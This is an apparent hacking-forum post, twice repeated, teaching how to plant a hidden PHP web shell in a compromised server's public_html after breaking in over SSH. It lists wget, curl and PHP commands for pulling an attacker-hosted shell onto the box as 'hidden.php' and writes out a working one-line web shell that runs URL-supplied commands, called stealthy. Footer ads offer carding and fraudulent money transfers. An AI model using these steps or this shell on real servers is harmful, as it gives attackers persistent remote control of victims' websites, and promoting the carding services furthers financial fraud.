- Joined
- 11 yrs. 6 mth. 27 days
- Messages
- 5,381
- Reaction score
- 18,380
- Age
- 45
- Wallet
- 11,590$
- [email protected]
[0x01] Intro:
Okay so today I will be giving some pointers on how to upload your shell to a hacked server via command line if for some reason you dont have write or upload permissions to upload.
[0x02] Scenario:
Lets say you just exploited a ssh protocol and have logged into the box. Your not familiar with command line stuff and would prefer a more graphical interface. (a shell). So what we would do is go the the document root of the hosted websites on the server. On most linux boxes the sites would be located in, /var/www/ , so we cd to that directory and we find our sites. Once in the site directory we go to the public_html directory and want to upload a shell to the root of the url. ( )
[0x03] Getting the shell:
[*] Wget:
wget -o hidden.php
[+] This command will use wget to download a shell that you have uploaded on a site you made, or just anywhere you have a shell hosted and changes the name of the shell from shell.php to hidden.php
[+] Shell Location:
[*] Curl:
curl -o hidden.php
[+] Curl is used mostly when wget is disabled on the box. It will do the same as wget, and the shell will be renamed hidden.php and found in the same location.
[*] Bash Command Line:
file_put_contents(hidden.php,file_get_contents( ))
[+] This command will do the same as well, just used when curl isnt installed and wget is disabled. It will rename the file to hidden.php and be in the same location.
[*] PHP Command Line:
echo "<?php print(shell_exec($_GET['exe'])); ?>" >> shell.php
[+] This command is echoing php code then piping the output to a newly created file (shell.php) This is what we love to call, a "tiny shell". No interface but works very well and is stealthy. Its a shell that uses command line but through the url like this:
[*] Touch & Editor:
Command 1: touch hidden.phpCommand 2: nano hidden.php OR vi hidden.phpNext: Copy & Paste shell code into hidden.php
[+] Touch command will create a file (hidden.php) and nano & vi are text editors used via terminal. Then just C&P the code and open hidden.php through your browser in the same location ( )
Okay so today I will be giving some pointers on how to upload your shell to a hacked server via command line if for some reason you dont have write or upload permissions to upload.
[0x02] Scenario:
Lets say you just exploited a ssh protocol and have logged into the box. Your not familiar with command line stuff and would prefer a more graphical interface. (a shell). So what we would do is go the the document root of the hosted websites on the server. On most linux boxes the sites would be located in, /var/www/ , so we cd to that directory and we find our sites. Once in the site directory we go to the public_html directory and want to upload a shell to the root of the url. ( )
[0x03] Getting the shell:
[*] Wget:
wget -o hidden.php
[+] This command will use wget to download a shell that you have uploaded on a site you made, or just anywhere you have a shell hosted and changes the name of the shell from shell.php to hidden.php
[+] Shell Location:
[*] Curl:
curl -o hidden.php
[+] Curl is used mostly when wget is disabled on the box. It will do the same as wget, and the shell will be renamed hidden.php and found in the same location.
[*] Bash Command Line:
file_put_contents(hidden.php,file_get_contents( ))
[+] This command will do the same as well, just used when curl isnt installed and wget is disabled. It will rename the file to hidden.php and be in the same location.
[*] PHP Command Line:
echo "<?php print(shell_exec($_GET['exe'])); ?>" >> shell.php
[+] This command is echoing php code then piping the output to a newly created file (shell.php) This is what we love to call, a "tiny shell". No interface but works very well and is stealthy. Its a shell that uses command line but through the url like this:
[*] Touch & Editor:
Command 1: touch hidden.phpCommand 2: nano hidden.php OR vi hidden.phpNext: Copy & Paste shell code into hidden.php
[+] Touch command will create a file (hidden.php) and nano & vi are text editors used via terminal. Then just C&P the code and open hidden.php through your browser in the same location ( )
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding